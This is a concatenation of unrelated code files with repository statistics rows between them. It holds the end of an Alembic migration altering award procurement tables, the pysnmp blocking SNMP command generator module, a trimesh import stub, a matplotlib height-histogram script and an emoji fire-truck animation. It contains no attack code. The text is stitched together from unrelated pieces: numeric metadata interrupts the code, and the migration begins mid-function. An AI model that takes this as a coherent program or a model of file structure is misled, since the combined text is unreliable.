op.add_column('award_procurement', sa.Column('referenced_idv_agency_name', sa.Text(), nullable=True))
op.add_column('award_procurement', sa.Column('referenced_idv_type', sa.Text(), nullable=True))
op.add_column('award_procurement', sa.Column('referenced_multi_or_single', sa.Text(), nullable=True))
op.add_column('detached_award_procurement', sa.Column('place_of_perform_country_n', sa.Text(), nullable=True))
op.add_column('detached_award_procurement', sa.Column('place_of_perform_state_nam', sa.Text(), nullable=True))
op.add_column('detached_award_procurement', sa.Column('referenced_idv_agency_name', sa.Text(), nullable=True))
op.add_column('detached_award_procurement', sa.Column('referenced_multi_or_single', sa.Text(), nullable=True))
op.add_column('detached_award_procurement', sa.Column('award_or_idv_flag', sa.Text(), nullable=True))
op.add_column('award_financial_assistance', sa.Column('legal_entity_country_name', sa.Text(), nullable=True))
op.add_column('award_financial_assistance', sa.Column('place_of_perform_country_n', sa.Text(), nullable=True))
op.add_column('award_financial_assistance', sa.Column('place_of_perform_county_co', sa.Text(), nullable=True))
op.add_column('detached_award_financial_assistance', sa.Column('legal_entity_country_name', sa.Text(), nullable=True))
op.add_column('detached_award_financial_assistance', sa.Column('place_of_perform_country_n', sa.Text(), nullable=True))
op.add_column('detached_award_financial_assistance', sa.Column('place_of_perform_county_co', sa.Text(), nullable=True))
op.add_column('published_award_financial_assistance', sa.Column('legal_entity_country_name', sa.Text(), nullable=True))
op.add_column('published_award_financial_assistance', sa.Column('place_of_perform_country_n', sa.Text(), nullable=True))
op.add_column('published_award_financial_assistance', sa.Column('place_of_perform_county_co', sa.Text(), nullable=True))
### end Alembic commands ###
def downgrade_data_broker():
### commands auto generated by Alembic - please adjust! ###
op.drop_column('published_award_financial_assistance', 'place_of_perform_county_co')
op.drop_column('published_award_financial_assistance', 'place_of_perform_country_n')
op.drop_column('published_award_financial_assistance', 'legal_entity_country_name')
op.drop_column('detached_award_financial_assistance', 'place_of_perform_county_co')
op.drop_column('detached_award_financial_assistance', 'place_of_perform_country_n')
op.drop_column('detached_award_financial_assistance', 'legal_entity_country_name')
op.drop_column('award_financial_assistance', 'place_of_perform_county_co')
op.drop_column('award_financial_assistance', 'place_of_perform_country_n')
op.drop_column('award_financial_assistance', 'legal_entity_country_name')
op.drop_column('detached_award_procurement', 'referenced_multi_or_single')
op.drop_column('detached_award_procurement', 'referenced_idv_agency_name')
op.drop_column('detached_award_procurement', 'place_of_perform_state_nam')
op.drop_column('detached_award_procurement', 'place_of_perform_country_n')
op.drop_column('detached_award_procurement', 'award_or_idv_flag')
op.drop_column('award_procurement', 'referenced_multi_or_single')
op.drop_column('award_procurement', 'referenced_idv_type')
op.drop_column('award_procurement', 'referenced_idv_agency_name')
op.drop_column('award_procurement', 'place_of_perform_state_nam')
op.drop_column('award_procurement', 'place_of_perform_county_na')
op.drop_column('award_procurement', 'place_of_perform_country_n')
op.drop_column('award_procurement', 'award_or_idv_flag')
### end Alembic commands ###
| 58.358025
| 124
| 0.78168
| 656
| 4,727
| 5.20122
| 0.129573
| 0.112544
| 0.09027
| 0.110785
| 0.88306
| 0.880129
| 0.860199
| 0.840563
| 0.828253
| 0.763775
| 0
| 0.012076
| 0.089063
| 4,727
| 80
| 125
| 59.0875
| 0.780307
| 0.065369
| 0
| 0
| 0
| 0
| 0.493157
| 0.404197
| 0
| 0
| 0
| 0
| 0
| 1
| 0.074074
| false
| 0
| 0.037037
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7d891439bed408c68a6815646024fc4d6d381f1a
| 23,241
|
py
|
Python
|
applied_python/applied_python/lib/python2.7/site-packages/pysnmp/hlapi/asyncore/sync/cmdgen.py
|
mith1979/ansible_automation
|
013dfa67c6d91720b787fadb21de574b6e023a26
|
[
"Apache-2.0"
] | null | null | null |
applied_python/applied_python/lib/python2.7/site-packages/pysnmp/hlapi/asyncore/sync/cmdgen.py
|
mith1979/ansible_automation
|
013dfa67c6d91720b787fadb21de574b6e023a26
|
[
"Apache-2.0"
] | null | null | null |
applied_python/applied_python/lib/python2.7/site-packages/pysnmp/hlapi/asyncore/sync/cmdgen.py
|
mith1979/ansible_automation
|
013dfa67c6d91720b787fadb21de574b6e023a26
|
[
"Apache-2.0"
] | null | null | null |
#
# This file is part of pysnmp software.
#
# Copyright (c) 2005-2016, Ilya Etingof <ilya@glas.net>
# License: http://pysnmp.sf.net/license.html
#
from sys import version_info
from pysnmp.hlapi.asyncore import cmdgen
from pysnmp.hlapi.varbinds import *
from pysnmp.proto.rfc1905 import endOfMibView
from pysnmp.proto import errind
from pyasn1.type.univ import Null
__all__ = ['getCmd', 'nextCmd', 'setCmd', 'bulkCmd']
if version_info[:2] < (2, 6):
__all__.append('next')
def next(iter):
return iter.next()
def getCmd(snmpEngine, authData, transportTarget, contextData,
*varBinds, **options):
"""Creates a generator to perform one or more SNMP GET queries.
On each iteration, new SNMP GET request is send (:RFC:`1905#section-4.2.1`).
The iterator blocks waiting for response to arrive or error to occur.
Parameters
----------
snmpEngine : :py:class:`~pysnmp.hlapi.SnmpEngine`
Class instance representing SNMP engine.
authData : :py:class:`~pysnmp.hlapi.CommunityData` or :py:class:`~pysnmp.hlapi.UsmUserData`
Class instance representing SNMP credentials.
transportTarget : :py:class:`~pysnmp.hlapi.asyncore.UdpTransportTarget` or :py:class:`~pysnmp.hlapi.asyncore.Udp6TransportTarget`
Class instance representing transport type along with SNMP peer address.
contextData : :py:class:`~pysnmp.hlapi.ContextData`
Class instance representing SNMP ContextEngineId and ContextName values.
\*varBinds : :py:class:`~pysnmp.smi.rfc1902.ObjectType`
One or more class instances representing MIB variables to place
into SNMP request.
Other Parameters
----------------
\*\*options :
Request options:
* `lookupMib` - load MIB and resolve response MIB variables at
the cost of slightly reduced performance. Default is `True`.
Yields
------
errorIndication : str
True value indicates SNMP engine error.
errorStatus : str
True value indicates SNMP PDU error.
errorIndex : int
Non-zero value refers to `varBinds[errorIndex-1]`
varBinds : tuple
A sequence of :py:class:`~pysnmp.smi.rfc1902.ObjectType` class
instances representing MIB variables returned in SNMP response.
Raises
------
PySnmpError
Or its derivative indicating that an error occurred while
performing SNMP operation.
Notes
-----
The `getCmd` generator will be exhausted immidiately unless
a new sequence of `varBinds` are send back into running generator
(supported since Python 2.6).
Examples
--------
>>> from pysnmp.hlapi.asyncore import *
>>> g = getCmd(SnmpEngine(),
... CommunityData('public'),
... UdpTransportTarget(('demo.snmplabs.com', 161)),
... ContextData(),
... ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0)))
>>> next(g)
(None, 0, 0, [ObjectType(ObjectIdentity(ObjectName('1.3.6.1.2.1.1.1.0')), DisplayString('SunOS zeus.snmplabs.com 4.1.3_U1 1 sun4m'))])
>>>
"""
def cbFun(snmpEngine, sendRequestHandle,
errorIndication, errorStatus, errorIndex,
varBinds, cbCtx):
cbCtx['errorIndication'] = errorIndication
cbCtx['errorStatus'] = errorStatus
cbCtx['errorIndex'] = errorIndex
cbCtx['varBinds'] = varBinds
cbCtx = {}
while True:
if varBinds:
cmdgen.getCmd(snmpEngine, authData, transportTarget,
contextData, *varBinds,
**dict(cbFun=cbFun, cbCtx=cbCtx,
lookupMib=options.get('lookupMib', True)))
snmpEngine.transportDispatcher.runDispatcher()
errorIndication = cbCtx['errorIndication']
errorStatus = cbCtx['errorStatus']
errorIndex = cbCtx['errorIndex']
varBinds = cbCtx['varBinds']
else:
errorIndication = errorStatus = errorIndex = None
varBinds = []
varBinds = (yield errorIndication, errorStatus, errorIndex, varBinds)
if not varBinds:
break
def setCmd(snmpEngine, authData, transportTarget, contextData,
*varBinds, **options):
"""Creates a generator to perform one or more SNMP SET queries.
On each iteration, new SNMP SET request is send (:RFC:`1905#section-4.2.5`).
The iterator blocks waiting for response to arrive or error to occur.
Parameters
----------
snmpEngine : :py:class:`~pysnmp.hlapi.SnmpEngine`
Class instance representing SNMP engine.
authData : :py:class:`~pysnmp.hlapi.CommunityData` or :py:class:`~pysnmp.hlapi.UsmUserData`
Class instance representing SNMP credentials.
transportTarget : :py:class:`~pysnmp.hlapi.asyncore.UdpTransportTarget` or :py:class:`~pysnmp.hlapi.asyncore.Udp6TransportTarget`
Class instance representing transport type along with SNMP peer address.
contextData : :py:class:`~pysnmp.hlapi.ContextData`
Class instance representing SNMP ContextEngineId and ContextName values.
\*varBinds : :py:class:`~pysnmp.smi.rfc1902.ObjectType`
One or more class instances representing MIB variables to place
into SNMP request.
Other Parameters
----------------
\*\*options :
Request options:
* `lookupMib` - load MIB and resolve response MIB variables at
the cost of slightly reduced performance. Default is `True`.
Default is `True`.
Yields
------
errorIndication : str
True value indicates SNMP engine error.
errorStatus : str
True value indicates SNMP PDU error.
errorIndex : int
Non-zero value refers to `varBinds[errorIndex-1]`
varBinds : tuple
A sequence of :py:class:`~pysnmp.smi.rfc1902.ObjectType` class
instances representing MIB variables returned in SNMP response.
Raises
------
PySnmpError
Or its derivative indicating that an error occurred while
performing SNMP operation.
Notes
-----
The `setCmd` generator will be exhausted immidiately unless
a new sequence of `varBinds` are send back into running generator
(supported since Python 2.6).
Examples
--------
>>> from pysnmp.hlapi.asyncore import *
>>> g = setCmd(SnmpEngine(),
... CommunityData('public'),
... UdpTransportTarget(('demo.snmplabs.com', 161)),
... ContextData(),
... ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0), 'Linux i386'))
>>> next(g)
(None, 0, 0, [ObjectType(ObjectIdentity(ObjectName('1.3.6.1.2.1.1.1.0')), DisplayString('Linux i386'))])
>>>
"""
def cbFun(snmpEngine, sendRequestHandle,
errorIndication, errorStatus, errorIndex,
varBinds, cbCtx):
cbCtx['errorIndication'] = errorIndication
cbCtx['errorStatus'] = errorStatus
cbCtx['errorIndex'] = errorIndex
cbCtx['varBinds'] = varBinds
cbCtx = {}
while True:
if varBinds:
cmdgen.setCmd(snmpEngine, authData, transportTarget,
contextData, *varBinds,
**dict(cbFun=cbFun, cbCtx=cbCtx,
lookupMib=options.get('lookupMib', True)))
snmpEngine.transportDispatcher.runDispatcher()
errorIndication = cbCtx['errorIndication']
errorStatus = cbCtx['errorStatus']
errorIndex = cbCtx['errorIndex']
varBinds = cbCtx['varBinds']
else:
errorIndication = errorStatus = errorIndex = None
varBinds = []
varBinds = (yield errorIndication, errorStatus, errorIndex, varBinds)
if not varBinds:
break
def nextCmd(snmpEngine, authData, transportTarget, contextData,
*varBinds, **options):
"""Creates a generator to perform one or more SNMP GETNEXT queries.
On each iteration, new SNMP GETNEXT request is send
(:RFC:`1905#section-4.2.2`). The iterator blocks waiting for response
to arrive or error to occur.
Parameters
----------
snmpEngine : :py:class:`~pysnmp.hlapi.SnmpEngine`
Class instance representing SNMP engine.
authData : :py:class:`~pysnmp.hlapi.CommunityData` or :py:class:`~pysnmp.hlapi.UsmUserData`
Class instance representing SNMP credentials.
transportTarget : :py:class:`~pysnmp.hlapi.asyncore.UdpTransportTarget` or :py:class:`~pysnmp.hlapi.asyncore.Udp6TransportTarget`
Class instance representing transport type along with SNMP peer address.
contextData : :py:class:`~pysnmp.hlapi.ContextData`
Class instance representing SNMP ContextEngineId and ContextName values.
\*varBinds : :py:class:`~pysnmp.smi.rfc1902.ObjectType`
One or more class instances representing MIB variables to place
into SNMP request.
Other Parameters
----------------
\*\*options :
Request options:
* `lookupMib` - load MIB and resolve response MIB variables at
the cost of slightly reduced performance. Default is `True`.
Default is `True`.
* `lexicographicMode` - stop iteration when all response MIB
variables leave the scope of initial MIB variables in
`varBinds`. Default is `True`.
* `ignoreNonIncreasingOid` - continue iteration even if response
MIB variables (OIDs) are not greater then request MIB variables.
Default is `False`.
* `maxRows` - stop iteration once this generator instance processed
`maxRows` of SNMP conceptual table. Default is `0` (no limit).
* `maxCalls` - stop iteration once this generator instance processed
`maxCalls` responses. Default is 0 (no limit).
Yields
------
errorIndication : str
True value indicates SNMP engine error.
errorStatus : str
True value indicates SNMP PDU error.
errorIndex : int
Non-zero value refers to `varBinds[errorIndex-1]`
varBinds : tuple
A sequence of :py:class:`~pysnmp.smi.rfc1902.ObjectType` class
instances representing MIB variables returned in SNMP response.
Raises
------
PySnmpError
Or its derivative indicating that an error occurred while
performing SNMP operation.
Notes
-----
The `nextCmd` generator will be exhausted on any of the following
conditions:
* SNMP engine error occurs thus `errorIndication` is `True`
* SNMP PDU `errorStatus` is reported as `True`
* SNMP :py:class:`~pysnmp.proto.rfc1905.EndOfMibView` values
(also known as *SNMP exception values*) are reported for all
MIB variables in `varBinds`
* *lexicographicMode* option is set to `False` and all
response MIB variables leave the scope of `varBinds`
At any moment a new sequence of `varBinds` could be send back into
running generator (supported since Python 2.6).
Examples
--------
>>> from pysnmp.hlapi.asyncore import *
>>> g = nextCmd(SnmpEngine(),
... CommunityData('public'),
... UdpTransportTarget(('demo.snmplabs.com', 161)),
... ContextData(),
... ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr')))
>>> next(g)
(None, 0, 0, [ObjectType(ObjectIdentity(ObjectName('1.3.6.1.2.1.1.1.0')), DisplayString('SunOS zeus.snmplabs.com 4.1.3_U1 1 sun4m'))])
>>> g.send( [ ObjectType(ObjectIdentity('IF-MIB', 'ifInOctets')) ] )
(None, 0, 0, [(ObjectName('1.3.6.1.2.1.2.2.1.10.1'), Counter32(284817787))])
"""
def cbFun(snmpEngine, sendRequestHandle,
errorIndication, errorStatus, errorIndex,
varBindTable, cbCtx):
cbCtx['errorIndication'] = errorIndication
cbCtx['errorStatus'] = errorStatus
cbCtx['errorIndex'] = errorIndex
cbCtx['varBindTable'] = varBindTable
lexicographicMode = options.get('lexicographicMode', True)
ignoreNonIncreasingOid = options.get('ignoreNonIncreasingOid', False)
maxRows = options.get('maxRows', 0)
maxCalls = options.get('maxCalls', 0)
cbCtx = {}
vbProcessor = CommandGeneratorVarBinds()
initialVars = [x[0] for x in vbProcessor.makeVarBinds(snmpEngine, varBinds)]
totalRows = totalCalls = 0
while True:
if varBinds:
cmdgen.nextCmd(snmpEngine, authData, transportTarget, contextData,
*[(x[0], Null()) for x in varBinds],
**dict(cbFun=cbFun, cbCtx=cbCtx,
lookupMib=options.get('lookupMib', True)))
snmpEngine.transportDispatcher.runDispatcher()
errorIndication = cbCtx['errorIndication']
errorStatus = cbCtx['errorStatus']
errorIndex = cbCtx['errorIndex']
if ignoreNonIncreasingOid and errorIndication and \
isinstance(errorIndication, errind.OidNotIncreasing):
errorIndication = None
if errorIndication:
yield errorIndication, errorStatus, errorIndex, varBinds
return
elif errorStatus:
if errorStatus == 2:
# Hide SNMPv1 noSuchName error which leaks in here
# from SNMPv1 Agent through internal pysnmp proxy.
errorStatus = errorStatus.clone(0)
errorIndex = errorIndex.clone(0)
yield errorIndication, errorStatus, errorIndex, varBinds
return
else:
varBinds = cbCtx['varBindTable'] and cbCtx['varBindTable'][0]
for idx, varBind in enumerate(varBinds):
name, val = varBind
if not isinstance(val, Null):
if lexicographicMode or initialVars[idx].isPrefixOf(name):
break
else:
return
totalRows += 1
totalCalls += 1
else:
errorIndication = errorStatus = errorIndex = None
varBinds = []
initialVarBinds = (yield errorIndication, errorStatus,\
errorIndex, varBinds)
if initialVarBinds:
varBinds = initialVarBinds
initialVars = [x[0] for x in vbProcessor.makeVarBinds(snmpEngine, varBinds)]
if maxRows and totalRows >= maxRows or \
maxCalls and totalCalls >= maxCalls:
return
def bulkCmd(snmpEngine, authData, transportTarget, contextData,
nonRepeaters, maxRepetitions, *varBinds, **options):
"""Creates a generator to perform one or more SNMP GETBULK queries.
On each iteration, new SNMP GETBULK request is send
(:RFC:`1905#section-4.2.3`). The iterator blocks waiting for response
to arrive or error to occur.
Parameters
----------
snmpEngine : :py:class:`~pysnmp.hlapi.SnmpEngine`
Class instance representing SNMP engine.
authData : :py:class:`~pysnmp.hlapi.CommunityData` or :py:class:`~pysnmp.hlapi.UsmUserData`
Class instance representing SNMP credentials.
transportTarget : :py:class:`~pysnmp.hlapi.asyncore.UdpTransportTarget` or :py:class:`~pysnmp.hlapi.asyncore.Udp6TransportTarget`
Class instance representing transport type along with SNMP peer address.
contextData : :py:class:`~pysnmp.hlapi.ContextData`
Class instance representing SNMP ContextEngineId and ContextName values.
nonRepeaters : int
One MIB variable is requested in response for the first
`nonRepeaters` MIB variables in request.
maxRepetitions : int
`maxRepetitions` MIB variables are requested in response for each
of the remaining MIB variables in the request (e.g. excluding
`nonRepeaters`). Remote SNMP engine may choose lesser value than
requested.
\*varBinds : :py:class:`~pysnmp.smi.rfc1902.ObjectType`
One or more class instances representing MIB variables to place
into SNMP request.
Other Parameters
----------------
\*\*options :
Request options:
* `lookupMib` - load MIB and resolve response MIB variables at
the cost of slightly reduced performance. Default is `True`.
Default is `True`.
* `lexicographicMode` - stop iteration when all response MIB
variables leave the scope of initial MIB variables in
`varBinds`. Default is `True`.
* `ignoreNonIncreasingOid` - continue iteration even if response
MIB variables (OIDs) are not greater then request MIB variables.
Default is `False`.
* `maxRows` - stop iteration once this generator instance processed
`maxRows` of SNMP conceptual table. Default is `0` (no limit).
* `maxCalls` - stop iteration once this generator instance processed
`maxCalls` responses. Default is 0 (no limit).
Yields
------
errorIndication : str
True value indicates SNMP engine error.
errorStatus : str
True value indicates SNMP PDU error.
errorIndex : int
Non-zero value refers to \*varBinds[errorIndex-1]
varBinds : tuple
A sequence of :py:class:`~pysnmp.smi.rfc1902.ObjectType` class
instances representing MIB variables returned in SNMP response.
Raises
------
PySnmpError
Or its derivative indicating that an error occurred while
performing SNMP operation.
Notes
-----
The `bulkCmd` generator will be exhausted on any of the following
conditions:
* SNMP engine error occurs thus `errorIndication` is `True`
* SNMP PDU `errorStatus` is reported as `True`
* SNMP :py:class:`~pysnmp.proto.rfc1905.EndOfMibView` values
(also known as *SNMP exception values*) are reported for all
MIB variables in `varBinds`
* *lexicographicMode* option is set to `False` and all
response MIB variables leave the scope of `varBinds`
At any moment a new sequence of `varBinds` could be send back into
running generator (supported since Python 2.6).
Setting `maxRepetitions` value to 15..50 might significantly improve
system performance, as many MIB variables get packed into a single
response message at once.
Examples
--------
>>> from pysnmp.hlapi.asyncore import *
>>> g = bulkCmd(SnmpEngine(),
... CommunityData('public'),
... UdpTransportTarget(('demo.snmplabs.com', 161)),
... ContextData(),
... 0, 25,
... ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr')))
>>> next(g)
(None, 0, 0, [ObjectType(ObjectIdentity(ObjectName('1.3.6.1.2.1.1.1.0')), DisplayString('SunOS zeus.snmplabs.com 4.1.3_U1 1 sun4m'))])
>>> g.send( [ ObjectType(ObjectIdentity('IF-MIB', 'ifInOctets')) ] )
(None, 0, 0, [(ObjectName('1.3.6.1.2.1.2.2.1.10.1'), Counter32(284817787))])
"""
def cbFun(snmpEngine, sendRequestHandle,
errorIndication, errorStatus, errorIndex,
varBindTable, cbCtx):
cbCtx['errorIndication'] = errorIndication
cbCtx['errorStatus'] = errorStatus
cbCtx['errorIndex'] = errorIndex
cbCtx['varBindTable'] = varBindTable
lexicographicMode = options.get('lexicographicMode', True)
ignoreNonIncreasingOid = options.get('ignoreNonIncreasingOid', False)
maxRows = options.get('maxRows', 0)
maxCalls = options.get('maxCalls', 0)
cbCtx = {}
vbProcessor = CommandGeneratorVarBinds()
initialVars = [x[0] for x in vbProcessor.makeVarBinds(snmpEngine, varBinds)]
nullVarBinds = [False] * len(initialVars)
totalRows = totalCalls = 0
stopFlag = False
while not stopFlag:
if maxRows and totalRows < maxRows:
maxRepetitions = min(maxRepetitions, maxRows-totalRows)
cmdgen.bulkCmd(snmpEngine, authData, transportTarget, contextData,
nonRepeaters, maxRepetitions,
*[(x[0], Null()) for x in varBinds],
**dict(cbFun=cbFun, cbCtx=cbCtx,
lookupMib=options.get('lookupMib', True)))
snmpEngine.transportDispatcher.runDispatcher()
errorIndication = cbCtx['errorIndication']
errorStatus = cbCtx['errorStatus']
errorIndex = cbCtx['errorIndex']
varBindTable = cbCtx['varBindTable']
if ignoreNonIncreasingOid and errorIndication and \
isinstance(errorIndication, errind.OidNotIncreasing):
errorIndication = None
if errorIndication:
yield errorIndication, errorStatus, errorIndex, \
varBindTable and varBindTable[0] or []
if errorIndication != errind.requestTimedOut:
return
elif errorStatus:
if errorStatus == 2:
# Hide SNMPv1 noSuchName error which leaks in here
# from SNMPv1 Agent through internal pysnmp proxy.
errorStatus = errorStatus.clone(0)
errorIndex = errorIndex.clone(0)
yield errorIndication, errorStatus, errorIndex, \
varBindTable and varBindTable[0] or []
return
else:
for i in range(len(varBindTable)):
stopFlag = True
if len(varBindTable[i]) != len(initialVars):
varBindTable = i and varBindTable[:i-1] or []
break
for j in range(len(varBindTable[i])):
name, val = varBindTable[i][j]
if nullVarBinds[j]:
varBindTable[i][j] = name, endOfMibView
continue
stopFlag = False
if isinstance(val, Null):
nullVarBinds[j] = True
elif not lexicographicMode and \
not initialVars[j].isPrefixOf(name):
varBindTable[i][j] = name, endOfMibView
nullVarBinds[j] = True
if stopFlag:
varBindTable = i and varBindTable[:i-1] or []
break
totalRows += len(varBindTable)
totalCalls += 1
if maxRows and totalRows >= maxRows:
if totalRows > maxRows:
varBindTable = varBindTable[:-(totalRows-maxRows)]
stopFlag = True
if maxCalls and totalCalls >= maxCalls:
stopFlag = True
for varBinds in varBindTable:
initialVarBinds = (yield errorIndication, errorStatus,\
errorIndex, varBinds)
if initialVarBinds:
varBinds = initialVarBinds
initialVars = [x[0] for x in vbProcessor.makeVarBinds(snmpEngine, varBinds)]
| 38.735
| 138
| 0.615937
| 2,321
| 23,241
| 6.161999
| 0.128824
| 0.016641
| 0.030905
| 0.030206
| 0.874983
| 0.857083
| 0.84212
| 0.828695
| 0.81541
| 0.805901
| 0
| 0.016738
| 0.287939
| 23,241
| 599
| 139
| 38.799666
| 0.847483
| 0.533927
| 0
| 0.754808
| 0
| 0
| 0.057043
| 0.00453
| 0
| 0
| 0
| 0
| 0
| 1
| 0.043269
| false
| 0
| 0.028846
| 0.004808
| 0.105769
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7db9761ee09127ca552ff6ad6a83819c07a6feda
| 41
|
py
|
Python
|
basis/trimesh/interfaces/__init__.py
|
takuya-ki/wrs
|
f6e1009b94332504042fbde9b39323410394ecde
|
[
"MIT"
] | 23
|
2021-04-02T09:02:04.000Z
|
2022-03-22T05:31:03.000Z
|
basis/trimesh/interfaces/__init__.py
|
takuya-ki/wrs
|
f6e1009b94332504042fbde9b39323410394ecde
|
[
"MIT"
] | 35
|
2021-04-12T09:41:05.000Z
|
2022-03-26T13:32:46.000Z
|
basis/trimesh/interfaces/__init__.py
|
takuya-ki/wrs
|
f6e1009b94332504042fbde9b39323410394ecde
|
[
"MIT"
] | 16
|
2021-03-30T11:55:45.000Z
|
2022-03-30T07:10:59.000Z
|
from . import scad
from . import blender
| 13.666667
| 21
| 0.756098
| 6
| 41
| 5.166667
| 0.666667
| 0.645161
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.195122
| 41
| 2
| 22
| 20.5
| 0.939394
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
81cb296b65166efb84ac449409d405b98a6c996e
| 2,286
|
py
|
Python
|
math/standard_deviation.py
|
IvoryLu/data-processing
|
65d91537dea777d037e9a419a355a0c8493aa19c
|
[
"BSD-3-Clause"
] | null | null | null |
math/standard_deviation.py
|
IvoryLu/data-processing
|
65d91537dea777d037e9a419a355a0c8493aa19c
|
[
"BSD-3-Clause"
] | null | null | null |
math/standard_deviation.py
|
IvoryLu/data-processing
|
65d91537dea777d037e9a419a355a0c8493aa19c
|
[
"BSD-3-Clause"
] | null | null | null |
import matplotlib.pyplot as plt
import numpy as np
from data import nba_data, okcupid_data
nba_mean = np.mean(nba_data)
okcupid_mean = np.mean(okcupid_data)
#Change this variable to your height (in inches)!
your_height = 65
nba_standard_deviation = np.std(nba_data)
okcupid_standard_deviation = np.std(okcupid_data)
plt.subplot(211)
plt.title("NBA Player Heights")
plt.xlabel("Height (inches)")
plt.hist(nba_data)
plt.axvline(nba_mean, color='#FD4E40', linestyle='solid', linewidth=2, label = "Mean")
plt.axvline(nba_mean + nba_standard_deviation, color='#FFB908', linestyle='solid', linewidth=2, label = "Standard Deviations")
plt.axvline(nba_mean - nba_standard_deviation, color='#FFB908', linestyle='solid', linewidth=2)
plt.axvline(nba_mean + nba_standard_deviation * 2, color='#FFB908', linestyle='solid', linewidth=2)
plt.axvline(nba_mean - nba_standard_deviation * 2, color='#FFB908', linestyle='solid', linewidth=2)
plt.axvline(nba_mean + nba_standard_deviation * 3, color='#FFB908', linestyle='solid', linewidth=2)
plt.axvline(nba_mean - nba_standard_deviation * 3, color='#FFB908', linestyle='solid', linewidth=2)
plt.axvline(your_height, color='#62EDBF', linestyle='solid', linewidth=2, label = "You")
plt.xlim(55, 90)
plt.legend()
plt.subplot(212)
plt.title("OkCupid Profile Heights")
plt.xlabel("Height (inches)")
plt.hist(okcupid_data)
plt.axvline(okcupid_mean, color='#FD4E40', linestyle='solid', linewidth=2, label = "Mean")
plt.axvline(okcupid_mean + okcupid_standard_deviation, color='#FFB908', linestyle='solid', linewidth=2, label = "Standard Deviations")
plt.axvline(okcupid_mean - okcupid_standard_deviation, color='#FFB908', linestyle='solid', linewidth=2)
plt.axvline(okcupid_mean + okcupid_standard_deviation * 2, color='#FFB908', linestyle='solid', linewidth=2)
plt.axvline(okcupid_mean - okcupid_standard_deviation * 2, color='#FFB908', linestyle='solid', linewidth=2)
plt.axvline(okcupid_mean + okcupid_standard_deviation * 3, color='#FFB908', linestyle='solid', linewidth=2)
plt.axvline(okcupid_mean - okcupid_standard_deviation * 3, color='#FFB908', linestyle='solid', linewidth=2)
plt.axvline(your_height, color='#62EDBF', linestyle='solid', linewidth=2, label = "You")
plt.xlim(55, 90)
plt.legend()
plt.tight_layout()
plt.show()
| 35.169231
| 134
| 0.757655
| 320
| 2,286
| 5.2375
| 0.165625
| 0.095465
| 0.21957
| 0.229117
| 0.778043
| 0.778043
| 0.778043
| 0.736277
| 0.736277
| 0.736277
| 0
| 0.041366
| 0.090551
| 2,286
| 64
| 135
| 35.71875
| 0.764791
| 0.020997
| 0
| 0.210526
| 0
| 0
| 0.140877
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.078947
| 0
| 0.078947
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
81d2dc816f6cc2393790151bec57ceda055cc66b
| 1,035
|
py
|
Python
|
9.1 name fire sequence test.py
|
asadava/NameSong
|
133b5ff107940ae7571c53de8a6cf89621f15f6c
|
[
"MIT"
] | null | null | null |
9.1 name fire sequence test.py
|
asadava/NameSong
|
133b5ff107940ae7571c53de8a6cf89621f15f6c
|
[
"MIT"
] | null | null | null |
9.1 name fire sequence test.py
|
asadava/NameSong
|
133b5ff107940ae7571c53de8a6cf89621f15f6c
|
[
"MIT"
] | null | null | null |
import time
print("🏪🛒🛒 ")
time.sleep(.2)
print("🏪🛒🛒 🔥🔥")
time.sleep(.2)
print("🏪🛒🛒🔥🔥")
time.sleep(.2)
print("🏪🛒🔥🔥")
time.sleep(.2)
print("🏪🔥🔥🌫")
time.sleep(.2)
print("🔥🔥🌫🌫")
time.sleep(0.2)
print("🔥🌫🌫🌫")
time.sleep(0.2)
print("🌫🌫🌫🌫")
time.sleep(1)
print("🌫🌫🌫🌫 🚒")
time.sleep(.2)
print("🌫🌫🌫🌫 🚒")
time.sleep(.2)
print("🌫🌫🌫🌫 🚒")
time.sleep(.2)
print("🌫🌫🌫🌫 🚒")
time.sleep(.2)
print("🌫🌫🌫🌫 🚒")
time.sleep(1)
print("🌫🌫🌫🌫 🚒👨🚒")
time.sleep(.2)
print("🌫🌫🌫🌫 🚒 🧯👨🚒")
time.sleep(.2)
print("🌫🌫🌫🌫 🚒👩🚒 🧯👨🚒")
time.sleep(.2)
print("🌫🌫🌫🌫 🚒 🧯👩🚒 🧯👨🚒")
time.sleep(.2)
print("🌫🌫🌫🌫 🚒 🧯👩🚒 🧯👨🚒")
time.sleep(1)
print("🌫🌫🌫🌫 🚒 🧯👩🚒 🧯👨🚒")
time.sleep(.2)
print("🌫🌫🌫🌫 🚒🧯👩🚒 🧯👨🚒")
time.sleep(.2)
print("🌫🌫🌫🌫 🧯👩🚒 🧯👨🚒")
time.sleep(.2)
print("🌫🌫🌫🌫🧯👩🚒 🧯👨🚒")
time.sleep(1)
